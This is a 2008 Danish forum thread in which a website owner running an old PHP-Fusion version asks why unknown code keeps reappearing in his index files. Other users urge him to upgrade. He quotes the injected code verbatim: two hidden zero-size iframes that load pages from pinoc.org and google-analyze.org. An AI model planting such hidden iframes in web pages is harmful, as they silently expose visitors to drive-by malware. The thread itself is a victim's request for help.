Avatar billede dosdesign Juniormester
17. august 2008 - 17:35 Der er 24 kommentarer og
1 løsning

Hjemmeside hacket eller? pinoc.org

Hej

Jeg har NOGEN gange bøvl med min hjemmeside som er langsom at komme ind på - den anden dag der jeg så sad og stirrede og ventede på min side skulle hentes færdig - så jeg i proceslinien at der stod den åbnede pinoc.org e.lign selvom det var min side som ikke hedder det ????

Idag så jeg så til min store rædsel og overraskelse, at der er tilføjet nogle ekstra kodelinier i min index fil :

<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Ved nogen hvordan det kan lade sig gøre at nogen kan skrive i min index fil uden at kende min webhotels kodeord?

+ ved nogen hvad det er?

Og ja jeg kan jo bare overskrive index filen med min backup fil, men hvad hjælper det hvis det kommer igen, for det gør det ?
Avatar billede leif Seniormester
17. august 2008 - 18:34 #1
Du har vel et hul i din opsætning
Avatar billede dosdesign Juniormester
17. august 2008 - 18:38 #2
ok, men hvad skal man gøre? og er det mon noget farligt?
Avatar billede leif Seniormester
17. august 2008 - 18:41 #3
Al kode som du ikke kender til er farligt
Avatar billede leif Seniormester
17. august 2008 - 18:41 #4
Kører du på et eller andet standard system ?
Avatar billede stalle Nybegynder
17. august 2008 - 18:59 #5
Det kunne være rart lige og høre hvor siden ligger henne ?
Avatar billede stalle Nybegynder
17. august 2008 - 19:02 #6
Avatar billede dosdesign Juniormester
17. august 2008 - 19:10 #7
Siden ligger hos webdomain og jeg har lavet den med det der Fusion (slags skabelon til hjemmeside med DB og php) - artiklen stalle linker til, hjælper ikke meget, nok fordi jeg ikek er skarp til engelsk !
Avatar billede leif Seniormester
17. august 2008 - 20:25 #8
Kører du med seneste version af Fusion ?
Avatar billede keysersoze Ekspert
17. august 2008 - 20:40 #9
En dansk artikel om det samme; http://web-dev.dk/post/2008/07/SQL-injections---mere-end-bare-et-pling.aspx

Men den hjælper nok ikke meget i dit tilfælde da du kører på et færdigt system - sørg for at opgradere til nyeste version der da ofte er sikkerhedshuller i sådanne ældre open source løsninger.
Avatar billede dosdesign Juniormester
17. august 2008 - 20:49 #10
Ok Tak smid et svar
Avatar billede dosdesign Juniormester
17. august 2008 - 20:51 #11
Dog vil jeg gerne have flere svar om præcis hvad det er og hvad man skal gøre !
Avatar billede bufferzone Praktikant
17. august 2008 - 22:42 #12
Du har som jeg forstår det brugt CMS systemet fusis-PHP eller PHP-fusion. Disse systemer opdateres hele tiden, fordi der findes huller i dem.

Du er blevet udsat for det der hedder cross site scripting og her er tale om et meget almindeligt angreb hvor nogen har indført noget ondsindet kode på dine sider der inficerer dem der besøger dine sider. Det kaldes drive by hacking.

Du bør finde ud af hvilken version du har liggende og så opdaterer dit system til nyeste version samt selvfølgelig fjerne den ondsindede kode. Hvis du nøjes med at fjerne koden og ikke opdaterer, så kommer koden hurtigt tilbage
Avatar billede dosdesign Juniormester
24. august 2008 - 13:36 #13
ja den er kommet igen efter 6 dage, jeg har bare slettet den igen (dvs. uploadet og overskrevet en backup af min index fil) - Ved ikek hvad jeg skal gøre  øv
Avatar billede bufferzone Praktikant
24. august 2008 - 14:11 #14
Så må du lige fortælle lidt mere om den løsning du bruger. Et det noget du selv har kodet eller bygger du oven på en færdig løsning du har downloadet og hvilken hvad hedder den løsning du har downloadet
Avatar billede dosdesign Juniormester
24. august 2008 - 14:50 #15
Det hedder "Powered by PHP-Fusion v4,01 © 2003-2004" og mit webhotel vil ikek hjælpe, siger det er mit problem og de lukekr min side hvis jeg ikek laver det??? Men jeg kan vel ikke gøre for at en hacker eller et hacker program selv kan gå ind i min index fil og tilføje ekstra kodelinier (de linier som er i første post i denne tråd) ??? Jeg kan jo ikke tjekke flere gange dagligt om de har været der igen efter jeg har slettet linierne - de skræmmer jo folk væk i længden hvis der af og til er bøvl med siden (når jeg ar hacket tager det nemlig flere minutter og åbne forsiden)
Avatar billede keysersoze Ekspert
24. august 2008 - 15:54 #16
det er også ene og alene dit problem og ikke webhotellets - men da dit problem i sidste ene kan gå ud over webhotellet er de i deres gode ret til at lukke for sikkerhedshullet, altså dig. Da det ikke er dig selv der har lavet hjemmeside kan du selvfølgelig ikke gøre for at siden misbruges - men du kan gøre noget ved det.

PHP-Fusion er så vidt jeg husker oppe i version 7 - altså sidder du med en old gammel version, der sikkerhedsmæssigt slet ikke er tidssvarende så du er nødt til at opgradere hurtigst muligt. PHP-Fusion må have den nødvendige dokumentation for hvordan det kan gøres - ellers må du ud og finde en der kan gøre det.
Avatar billede dosdesign Juniormester
24. august 2008 - 16:30 #17
ja det er jo det - men jeg har aldrig haft tid til det + det er meget omfattende at opgradere....samtidig er alle mine undersider + andre docs. lavet om af mig selv (dvs. selv kodet det hele i html og siden voirker jo fint som den er), så det ville tage meget lang tid at opgradere, derfor har jeg ikke haft tid, men jeg må jo nok til at få det gjort .... bare bange for der går ged i den
Avatar billede bufferzone Praktikant
24. august 2008 - 16:44 #18
Der er ingen vej uden om, hvis du ikke fjerner hullet så vil de vedblive med at hacke dig.
Avatar billede dosdesign Juniormester
24. august 2008 - 16:49 #19
Ja hvis man så bare lige vidste hvordan man lige kunne lukket hullet !
Avatar billede dosdesign Juniormester
02. september 2008 - 17:24 #20
Hej igen

Jeg har fundet ud af mit problem er størrere (det med min index fil bliver tilføjet kode jeg ikke kender til) !

Jeg har åbentbart mindst 7 index filer som ca. 1. gang om ugen bliver hacket og da jeg jo som skrevet ikke ved hvad at gøre tænkte jeg om man ikke bare kunne sætte filernes CMODS til 777 ??

a) Tror i/du det hjælper ??

b) kan det skade trafikken/brugerne af min sides oplevelse - jeg mener kan det medfører de ikke kan komme ind på nogle sider eller ikke kan gøre som de plejer/har ret til ??
Ja hvad ved jeg tør ikke sætte dem til 777 hvis det ødelægger noget for mig elelr mine brugere !


Danni
Avatar billede leif Seniormester
03. september 2008 - 18:54 #21
Start nu med at få opdateret dit system til nyeste version

Hvorfor lige 777, så giver du reelt alle på serveren til at rette i dine filer !


En side som hackes skal undersøges og hullet skal lukkes, at sige det gør jeg ikke noget ved det så siger du reelt at vi godt må bruge din side til ulovligheder.
Avatar billede dosdesign Juniormester
03. september 2008 - 19:16 #22
UPS jeg mente omvendt af 777, altså så der ikke er rettigheder til at WRITE - men ok den var før 644 så det hjælper ikke - Ved ikek lige hvordan man skal lukke hullerne !
Avatar billede dosdesign Juniormester
03. september 2008 - 19:17 #23
Jeg kan ikke finde ud af at opdatere til nyeste version - da den er flere version foran mig og der er ikke guide???
Avatar billede leif Seniormester
03. september 2008 - 19:28 #24
Så har du 2 valg, lave dig en nye side eller ignorere problemet. Jeg tror næppe som der er nogen som begynder at lukke huller i et system som ikke er opdateret til nyeste version
Avatar billede dosdesign Juniormester
03. september 2008 - 19:59 #25
Ja - MEN tak for hjælpen !
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Computerworld tilbyder specialiserede kurser i database-management

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester

Seneste spørgsmål Seneste aktivitet
I dag 10:21 Ny printer, men hvilken Af mort1 i Printere
I går 19:41 USB på Linux Af Uvanga i Linux
12/0818:26 Hvilken type mus Af mort1 i PC
11/0813:21 ms Forms Af leahcim i Andet software
10/0821:30 Blokeret på Snapchat? Af LineP i Chat & Messaging